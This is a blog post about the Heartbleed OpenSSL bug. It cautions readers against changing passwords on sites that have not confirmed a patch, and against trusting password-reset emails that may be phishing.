Source

Heartbleed: Caveat Emptor

Post navigation

← Previous Next →

The news sounds relatively good about Heartbleed: the problem is known, a patch as been made to OpenSSL and that’s being applied in many places.

So, emails are rolling out from affected sites saying “change your password”.  But, you should be leery, and here’s why:

Was the site patched!?

I have seen too many emails that don’t point out that they’ve actually patched the problem on their site!  The downshot of that is that changing a password is going to be done over TLS (https) and require username/password information over that “encrypted” pipe.  If they haven’t patched their site, you’re guaranteeing you’re putting your account on that site at risk!  You may not have entered a password on that site since the heartbleed bug was created (or before it was known and exploitable) and may not have been at risk before now.  Changing your password on an unpatched site guarantees you’ll be at risk!

Have your admins been compromised!?

Admins of a site go through the same https security as the rest of us—who’s to say they haven’t been compromised?  Given the previous section, if they have been compromised (and a patch hasn’t been installed yet) then it would seem (from a bad-guy’s point of view) that sending out an email to change passwords is an excellent idea to get more passwords!

Caveat Emptor

Beware! You can’t really trust some email you get.  Make sure that you use one or more trusted ways of detecting heartbleed (or lack thereof) before you change your password!

All the security pundits saying rush out and change your password isn’t really helping either.

This entry was posted in Heartbleed, Security by PeterRitchie. Bookmark the permalink.

with : ,